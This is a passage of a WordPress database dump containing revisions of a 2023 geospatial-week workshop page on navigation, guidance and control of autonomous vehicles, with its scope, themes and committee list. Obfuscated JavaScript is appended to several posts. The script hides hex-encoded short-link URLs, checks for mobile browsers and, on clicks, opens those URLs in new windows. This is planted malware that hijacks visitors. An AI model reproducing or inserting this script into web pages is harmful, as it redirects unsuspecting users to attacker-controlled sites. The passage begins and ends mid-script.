wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','NGC of AV: Navigation, Guidance and Control of Autonomous Vehicles','','inherit','closed','closed','','2856-revision-v1','','','2022-10-14 22:40:10','2022-10-14 22:40:10','',2856,'https://gsw2023.com/?p=2869',0,'revision','',0),
(2870,1,'2022-10-14 22:42:17','2022-10-14 22:42:17','<p>[vc_row][vc_column width=\"2/3\"][vc_column_text]</p>\r\n<h5><strong>Scope:</strong></h5>\r\n<h5><strong>Integrated Wireless, Multi-Sensor, Multi-Perception Systems for High-Precision Positioning, Guidance and Control of Autonomous Vehicles</strong></h5>\r\n<p>[/vc_column_text][vc_column_text]</p>\r\n<h6 style=\"text-align: justify; color: black;\"><strong>Autonomous vehicles (AVs) promise to enhance safety, reduce emissions, and improve transportation system efficiency and reliability. The growing demand for AVs is shaping the future of the automotive industry by transforming the in-vehicle experience and paving the way for large-scale implementation of autonomous driving. The positioning, guidance, and control technologies for future Avs are rapidly advancing. They require on onboard intelligence relying on a suite of sensors and systems such as global navigation satellite systems (GNSS) receivers, mmWave wireless technology (5G/6G), vehicle motion sensors and remote sensing systems including cameras, light detection and ranging (LiDAR) and radar. AVs that can sense the environment and navigating without human input require robust advanced positioning, navigation, and guidance for efficient operation in all environments and weather conditions. The availability of the above sensors and systems in future AVs provides an attractive opportunity to advance the robustness and safety of autonomous driving. This workshop will seek original contributions covering advanced topics related to the state of the art and future trends of positioning and mapping as well as control and guidance technologies for autonomous vehicles and future self-driving.</strong></h6>\r\n<h6><strong>The workshop will be part of the ISPRS Geospatial Week 2023 and is hosted the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) in parallel with several related geospatial workshops.</strong></h6>\r\n<p>.[/vc_column_text][/vc_column][vc_column width=\"1/3\"][vc_single_image image=\"2857\" img_size=\"600x400\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"black\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\r\n<h1 style=\"text-align: left;\">CHAIRS</h1>\r\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"53\"][vc_separator color=\"black\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text]</p>\r\n<h5 style=\"text-align: justify; color: blue;\"><strong><u>Themes:</u></strong></h5>\r\n<ul>\r\n<li>\r\n<h6><strong>GNSS based high precision positioning in challenging urban environments.</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>New wireless technologies and methods for AV connectivity, cooperative perception, positioning, and path planning.</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Recent technical advances in perception systems meeting the growing AV demands.</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Advanced AI-based multi-system fusion for positioning, mapping, and guidance.</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Machine-learning based object identification, classification, and mapping.</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Innovative self-Localization and mapping (SLAM).</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Control of AVs and mobile robots.</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Communication schemes for multiple AVs.</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Innovations in other autonomous systems (UAVs, UGVs, and drones)</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Applications of AVs.</strong></h6>\r\n</li>\r\n</ul>\r\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_column_text]</p>\r\n<h5 style=\"text-align: justify; color: blue;\"><strong><u>Scientific Committee:</u></strong></h5>\r\n<ul>\r\n<li>\r\n<h6><strong>Cairo Lúcio Nascimento Junior, ITA, Brazil</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Peter Travis Jardine, Royal Military College of Canada, ON, Canada</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Mohamed Tamazin, Orolia, Montreal, QC, Canada</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Paul Hershey, Raytheon, USA (I still need to confirm with him)</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Mohamed Elhabiby, Micro Engineering Technologies Inc.</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Caroline Channel, ISAE-Supaero, France</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Ashraf Abosekeen, Military Technical College, Cairo, Egypt.</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Umar Iqbal, Mississippi State University, USA</strong></h6>\r\n</li>\r\n</ul>\r\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','NGC of AV: Navigation, Guidance and Control of Autonomous Vehicles','','inherit','closed','closed','','2856-revision-v1','','','2022-10-14 22:42:17','2022-10-14 22:42:17','',2856,'https://gsw2023.com/?p=2870',0,'revision','',0),
(2871,1,'2022-10-14 22:43:36','2022-10-14 22:43:36','','m1','','inherit','open','closed','','m1-5','','','2022-10-14 22:43:36','2022-10-14 22:43:36','',2856,'https://gsw2023.com/wp-content/uploads/2022/10/m1-4.jpg',0,'attachment','image/jpeg',0),
(2872,1,'2022-10-15 21:04:26','2022-10-15 21:04:26','<!-- wp:paragraph -->\n<p>North Carolina A&amp;T State University, USA (WG I/4)</p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( 